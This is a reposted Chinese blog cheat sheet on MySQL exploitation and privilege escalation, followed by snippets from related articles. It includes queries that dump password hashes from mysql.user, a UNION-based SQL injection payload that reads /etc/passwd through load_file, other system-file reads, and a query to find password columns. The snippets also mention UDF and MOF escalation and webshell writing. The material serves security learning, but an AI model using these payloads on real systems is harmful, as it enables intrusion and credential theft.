mysql 漏洞利用与提权

最新推荐文章于 2024-11-05 14:22:47 发布
转载 最新推荐文章于 2024-11-05 14:22:47 发布 · 294 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/linuxsec/p/11179582.html
文章标签:

#数据库 #php #操作系统

博客围绕MySQL展开,介绍判断其服务运行权限的方法,如查看系统账号、priority值和端口外联情况;还提及密码获取与破解,包括获取网站数据库账号密码、查询user表;给出渗透技巧、常见命令、常用内置函数,以及快速定位密码表的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

判断MySQL服务运行的权限

1、查看系统账号,如果出现MySQL这类用户,意味着系统可能出现了降权。

2、看mysqld运行的priority值。

3、查看端口是否可外联。

 

MySQL密码获取与破解

1、获取网站数据库账号和密码

2、获取MySQL数据库user表

用户一共有三个文件,即user.frm、user.MYD、user.MYI,MySQL数据库用户密码都保存在user.MYD文件中,包括root用户和其他用户密码。

 

MySQL密码查询

select user,password from mysql.user;

select user,password from mysql.user where user = 'root';

 

mysql 渗透技巧

如果发现一个PHP的SQL 注入点,可以通过构造"-1 union select 1,1,1,1,1,load_file('/etc/passwd')"

直接读取的配置文件的命令如下

select load_file('/etc/passwd')\

select load_file('/etc/issues')

select load_file('/etc/etc/rc.local')

 

一些常见的MySQL命令

show databases;

use testdatabases; 使用某个数据库

show tables;

select * from a 查询a表中所有的数据

select @@datadir;  查询数据库的路径

select @@basedir  查询mysql的安装路径

常用内置函数

select system_user() 查询系统

select current_user() 查询用户

select user() 查询用户

select version() 查询数据库版本

select database() 查询当前连接的数据库

select @@version_compile_os查询当前操作系统

select now() 显示当前时间

 

快速定位数据库中涉及的密码表

select table_schema,table_name,column_name from information_schema.columns where column_name like ‘%password%’;

 

转载于:https://www.cnblogs.com/linuxsec/p/11179582.html

mysql漏洞利用
willow_liang的博客
04-22 2876
目录 一 、Mysql信息收集 1.使用Nmap进行mysql的信息收集 2.通过msf探测mysql信息 3.使用sqlmap进行sql注入收集mysql版本信息 二、获取mysql密码 1.使用msf模块爆破 2.nmap脚本进行爆破 3.sqlmap的sql-shell查询哈希值 4.从网站泄露的源代码中查找配置文件获取用户名密码 三、通过Mysql向服务器写shell 1.利用联合注入写入shell 2.当sql注入为盲注或者报错注入时,可以使用分隔符写入shell 3.当
网络攻防实战研究 漏洞利用读书笔记二
一枚努力的蛋蛋
08-24 3483
网络攻防实战研究 漏洞利用读书笔记二第2章 Windows漏洞利用2.1 Windows基础2.1.1 Windows信息的收集2.1.2 Windows准备2.1.3 使用MSF平台搜索可利用的POC2.1.4 实施2.1.5 停用安全狗2.2 辅助工具Windows-Exploit-Suggester2.2.1 Windows-Exploit-Suggester...
MySQL数据库渗透及漏洞利用总结
05-09 4520
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和W...
MySQL 漏洞利用
weixin_50464560的博客
07-15 2883
转载于https://www.sqlsec.com/2020/11/mysql.html#toc-heading-1 自从接触安全以来就 MySQLUDF 、MOF 耳熟能详,但是貌似国光我一直都没有单独总结过这些零散的姿势点,所以本文就诞生了,再解决自己以前的困扰之余,也希望本文可以帮助到其他网友。限获取数据库操作限本文讲的是 MySQL 相关知识,但是之前得先拿到高限的 MySQL 用户才可以,拿到 MySQL 的用户名和密码的方式多种多样,但是不外乎就下面几种方法:MySQ
Mysql漏洞利用(越,实战怎么从低限拿到root密码)
07-30
Mysql漏洞利用(越,实战怎么从低限拿到root密码)
MySQL数据库***及漏洞利用总结
weixin_34357887的博客
11-14 1011
MySQL 数据库***及漏洞利用总结SimeonMySQL 数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用 MySQL 作为其数据库支撑,目前很多架构都以 MySQL 作为数据库管理系统,例如 LAMP、和 WAMP 等。在针对网站***中,很多都是跟 MySQL 数据库有关,各种 MySQL 注入,MySQL MySQL 数据库 root 账号 webshell 获...
Linux利用UDF库实现Mysql
09-10
请注意,这种方法具有潜在的安全风险,如果被恶意利用,可能导致系统安全漏洞。因此,理解并妥善管理MySQLUDF功能至关重要,只有在必要且受控的环境下进行此类操作。在生产环境中,务必遵循最小限原则,并...
Mysql数据库UDF
最新发布
CoffeMilk的博客
11-05 4233
渗透人员编写可调用系统命令行(CMD或shell)的文件生成动态链接库(Windows系统是.dll;Linux系统是.so),且将该动态链接库内容上传到MySql的函数插件文件夹目录下;然后在通过sql语句调用该动态链接库创建一个自定义函数,最后直接调用该自定义函数sql执行查询系统命令,实现(即:在数据库中的查询就等价于直接在系统调用cmd或者shell中执行命令)
MySQLUDF
2301_76227305的博客
06-08 3065
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正补充,有兴趣的师傅可以一起交流学习。
MySQL/条件竞争漏洞分析和利用(37)
yyj1781572的博客
04-30 1878
通过本实验,能够掌握MySQL/条件竞争漏洞的原理,并能够复现该漏洞,以及掌握该漏洞的修复方法。
mysql注入命令
12-03
mysql注入命令 php类型的网站很多都存在MYSQL注入漏洞,而利用注入来获取限的方法又多种多样。本文以mysql中支持的SCHEMATA库为例讲述mysql注入高级暴库用户密码
暗月mysql全版本通杀
06-21
暗月mysql全版本通杀
学习:MySQL数据库(mof 漏洞
bylfsj的博客
10-12 737
1.原理 关于 mof 的原理其实很简单,就是利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。 2.执行 1.将一下代码保存为nullevt.mof文件 #pragma namespace("\\.\root\subscription") instance ...
mysql注入漏洞手注
一个码农的笔记
09-29 6180
mysql: 报错注入: 以http://www.hexie.com/main/articleDetail.php?id=757 为例子: http://www.hexie.com/main/articleDetail.php?id=757' 报错 方法一:(1)http://www.hexie.com/main/articleDetail.php ?id=757' and (sel
Mysql 身份认证绕过漏洞(CVE-2012-2122)复现
weixin_57379923的博客
08-09 1086
这段代码的主要目的是尝试通过 MySQL 客户端连接到指定的数据库服务器,重定向错误输出以保持输出简洁。版 声 明:本博客所有文章除特别声明外,均采用。文章版归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。作 者:PeiyuJue。将这些数字赋值给变量。
Mysql身份认证漏洞复现(CVE-2012-2122)
又菜又爱倒腾的博客
10-29 2632
#Mysql身份认证漏洞(CVE-2012-2122)# 一、漏洞简介 当连接MariaDB/MySQL时,输入的密码会期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 二、漏洞影响 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL vers
Mysql身份认证漏洞复现(CVE-2012-2122)】
qq_61947585的博客
07-06 379
当连接 MariaDB/MySQL 时,输入的密码会期望的正确密码比较,由于不正确的处理,会导致即便是 memcmp() 返回一个非零值,也会使 MySQL 认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入 SQL 数据库
MySQL身份认证漏洞(CVE-2012-2122漏洞复现
weixin_48739941的博客
04-11 3003
(1)漏洞原理 当连接MariaDB/MySQL时,输入的密码会期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞编号。 (2)修复 ①对数据库进行升级打补丁。 ②在防火墙上关闭MySQL端口。 (3)cd vulhub/mysql/CVE-2012-2122 切换目录。 (4)vim docker-compose.yml 修改端口映射。 (5)dock
MySQL免杀UDF技术教程工具分享
综上所述,MySQLUDF是一种针对数据库服务的安全威胁,它允许攻击者利用数据库UDF漏洞限,从而获得对操作系统的控制。了解UDF的原理和防御策略对于维护数据库及整个IT系统的安全至关重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值